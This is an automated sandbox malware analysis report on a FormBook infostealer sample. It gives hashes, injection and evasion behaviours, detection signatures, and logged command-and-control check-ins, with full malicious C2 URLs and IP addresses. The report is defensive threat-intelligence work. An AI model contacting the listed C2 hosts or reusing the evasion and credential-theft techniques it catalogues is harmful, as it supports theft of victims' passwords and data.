Edit tour

Windows Analysis Report
EIvidclKOb.exe

Overview

General Information

Sample name:	EIvidclKOb.exe renamed because original name is a hash value
Original sample name:	dc94e6d1c534717dc63dec5adbec6bb4f13dada8c5938a937ceb3b923b49f2bd.exe
Analysis ID:	1587990
MD5:	76bf1f21c8727faacb6f4761b72e17b8
SHA1:	2f7bf982edbe0a9b8425b5b3e1ac5508d8f46e6b
SHA256:	dc94e6d1c534717dc63dec5adbec6bb4f13dada8c5938a937ceb3b923b49f2bd
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

EIvidclKOb.exe (PID: 6368 cmdline: "C:\Users\user\Desktop\EIvidclKOb.exe" MD5: 76BF1F21C8727FAACB6F4761B72E17B8)

svchost.exe (PID: 1852 cmdline: "C:\Users\user\Desktop\EIvidclKOb.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

HMKEBhehjTFHSE.exe (PID: 2132 cmdline: "C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

comp.exe (PID: 6252 cmdline: "C:\Windows\SysWOW64\comp.exe" MD5: 712EF348F7032AA1C80D24600BA5452D)

HMKEBhehjTFHSE.exe (PID: 1400 cmdline: "C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 4836 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.3960892293.00000000008D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2482909431.0000000003A40000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2482512715.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3960832005.0000000000880000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3959727235.00000000001B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3962348656.0000000005900000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3960869459.0000000002E80000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2483416999.0000000004950000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\EIvidclKOb.exe", CommandLine: "C:\Users\user\Desktop\EIvidclKOb.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\EIvidclKOb.exe", ParentImage: C:\Users\user\Desktop\EIvidclKOb.exe, ParentProcessId: 6368, ParentProcessName: EIvidclKOb.exe, ProcessCommandLine: "C:\Users\user\Desktop\EIvidclKOb.exe", ProcessId: 1852, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\EIvidclKOb.exe", CommandLine: "C:\Users\user\Desktop\EIvidclKOb.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\EIvidclKOb.exe", ParentImage: C:\Users\user\Desktop\EIvidclKOb.exe, ParentProcessId: 6368, ParentProcessName: EIvidclKOb.exe, ProcessCommandLine: "C:\Users\user\Desktop\EIvidclKOb.exe", ProcessId: 1852, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:19:04.222272+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49940	38.47.233.21	80	TCP
2025-01-10T20:19:28.892813+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49978	172.67.137.47	80	TCP
2025-01-10T20:20:03.931160+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49983	206.238.89.119	80	TCP
2025-01-10T20:20:17.190877+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49987	66.29.149.46	80	TCP
2025-01-10T20:20:30.582222+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49991	217.70.184.50	80	TCP
2025-01-10T20:20:44.725046+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49995	13.228.81.39	80	TCP
2025-01-10T20:21:06.928431+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49999	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:19:04.222272+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49940	38.47.233.21	80	TCP
2025-01-10T20:19:28.892813+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49978	172.67.137.47	80	TCP
2025-01-10T20:20:03.931160+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49983	206.238.89.119	80	TCP
2025-01-10T20:20:17.190877+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49987	66.29.149.46	80	TCP
2025-01-10T20:20:30.582222+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49991	217.70.184.50	80	TCP
2025-01-10T20:20:44.725046+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49995	13.228.81.39	80	TCP
2025-01-10T20:21:06.928431+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49999	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:19:21.140126+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49975	172.67.137.47	80	TCP
2025-01-10T20:19:23.685783+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49976	172.67.137.47	80	TCP
2025-01-10T20:19:26.524559+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49977	172.67.137.47	80	TCP
2025-01-10T20:19:36.245732+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49980	206.238.89.119	80	TCP
2025-01-10T20:19:38.792673+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49981	206.238.89.119	80	TCP
2025-01-10T20:19:41.339519+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49982	206.238.89.119	80	TCP
2025-01-10T20:20:09.629779+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49984	66.29.149.46	80	TCP
2025-01-10T20:20:12.712973+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49985	66.29.149.46	80	TCP
2025-01-10T20:20:14.779507+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49986	66.29.149.46	80	TCP
2025-01-10T20:20:22.898570+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49988	217.70.184.50	80	TCP
2025-01-10T20:20:25.474482+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49989	217.70.184.50	80	TCP
2025-01-10T20:20:28.040899+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49990	217.70.184.50	80	TCP
2025-01-10T20:20:37.040856+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49992	13.228.81.39	80	TCP
2025-01-10T20:20:39.798456+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49993	13.228.81.39	80	TCP
2025-01-10T20:20:42.148536+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49994	13.228.81.39	80	TCP
2025-01-10T20:20:50.252437+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49996	13.248.169.48	80	TCP
2025-01-10T20:20:53.839686+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49997	13.248.169.48	80	TCP
2025-01-10T20:20:55.330493+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49998	13.248.169.48	80	TCP
2025-01-10T20:21:13.496036+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50000	104.21.96.1	80	TCP
2025-01-10T20:21:16.042857+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50001	104.21.96.1	80	TCP
2025-01-10T20:21:18.728968+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50002	104.21.96.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.muasamgiare.click/dc08/?_6yxCX=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z05Tnrv+b0LyIlhV4f69ltmWPUKvodMcjYbnCl+ENwjRpaA==&vNTT0=e8zLx	Avira URL Cloud: Label: malware
Source: http://www.sunnyz.store/ead0/	Avira URL Cloud: Label: malware
Source: http://www.gk88top.top/vjnn/?_6yxCX=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1C145Dcw9vjhITsM+OTgM5u/otOh0qpDqOlQHZdtVA7DGw==&vNTT0=e8zLx	Avira URL Cloud: Label: malware
Source: http://www.gk88top.top/vjnn/	Avira URL Cloud: Label: malware
Source: https://www.muasamgiare.click/dc08/?_6yxCX=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB	Avira URL Cloud: Label: malware
Source: http://www.sunnyz.store/ead0/?vNTT0=e8zLx&_6yxCX=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhrmN7KgNDD+8nl5ENQfO4rN6vw62ks37+HoPu6Jjp4YWnA==	Avira URL Cloud: Label: malware
Source: http://www.muasamgiare.click/dc08/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: EIvidclKOb.exe	Virustotal: Detection: 66%			Perma Link
Source: EIvidclKOb.exe	ReversingLabs: Detection: 73%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3960892293.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2482909431.0000000003A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2482512715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3960832005.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3959727235.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3962348656.0000000005900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3960869459.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2483416999.0000000004950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: EIvidclKOb.exe

Joe Sandbox ML: detected

Source: EIvidclKOb.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: comp.pdb source: svchost.exe, 00000002.00000003.2449139398.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482750657.0000000003400000.00000004.00000020.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000004.00000002.3960311147.0000000000838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HMKEBhehjTFHSE.exe, 00000004.00000002.3959727230.00000000000EE000.00000002.00000001.01000000.00000005.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3959730094.00000000000EE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: comp.pdbGCTL source: svchost.exe, 00000002.00000003.2449139398.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482750657.0000000003400000.00000004.00000020.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000004.00000002.3960311147.0000000000838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: EIvidclKOb.exe, 00000000.00000003.2098547208.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, EIvidclKOb.exe, 00000000.00000003.2106907929.0000000004390000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482944957.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482944957.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2390348349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388242683.0000000003700000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000002.3961255868.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000005.00000003.2482648053.000000000088A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000003.2486501922.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000002.3961255868.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: EIvidclKOb.exe, 00000000.00000003.2098547208.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, EIvidclKOb.exe, 00000000.00000003.2106907929.0000000004390000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2482944957.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482944957.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2390348349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388242683.0000000003700000.00000004.00000020.00020000.00000000.sdmp, comp.exe, comp.exe, 00000005.00000002.3961255868.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000005.00000003.2482648053.000000000088A000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000003.2486501922.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000002.3961255868.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: comp.exe, 00000005.00000002.3961674856.000000000332C000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000005.00000002.3959858179.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000000.2553970741.00000000034CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2786479701.000000003B34C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: comp.exe, 00000005.00000002.3961674856.000000000332C000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000005.00000002.3959858179.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000000.2553970741.00000000034CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2786479701.000000003B34C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00F6445A
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6C6D1 FindFirstFileW,FindClose,	0_2_00F6C6D1
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00F6C75C
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F6EF95
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F6F0F2
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F6F3F3
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F637EF
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F63B12
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F6BCBC
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001CC420 FindFirstFileW,FindNextFileW,FindClose,	5_2_001CC420

Source: C:\Windows\SysWOW64\comp.exe	Code function: 4x nop then xor eax, eax	5_2_001B9F20
Source: C:\Windows\SysWOW64\comp.exe	Code function: 4x nop then pop edi	5_2_001BE0FB
Source: C:\Windows\SysWOW64\comp.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_009D0528

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49940 -> 38.47.233.21:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49940 -> 38.47.233.21:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49983 -> 206.238.89.119:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49983 -> 206.238.89.119:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49976 -> 172.67.137.47:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49995 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 217.70.184.50:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49999 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 217.70.184.50:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49999 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49995 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49975 -> 172.67.137.47:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49977 -> 172.67.137.47:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49978 -> 172.67.137.47:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49978 -> 172.67.137.47:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49991 -> 217.70.184.50:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49991 -> 217.70.184.50:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 206.238.89.119:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 206.238.89.119:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 206.238.89.119:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49987 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49987 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 217.70.184.50:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 13.228.81.39:80

Source: Joe Sandbox View	IP Address: 38.47.233.21 38.47.233.21
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00F722EE

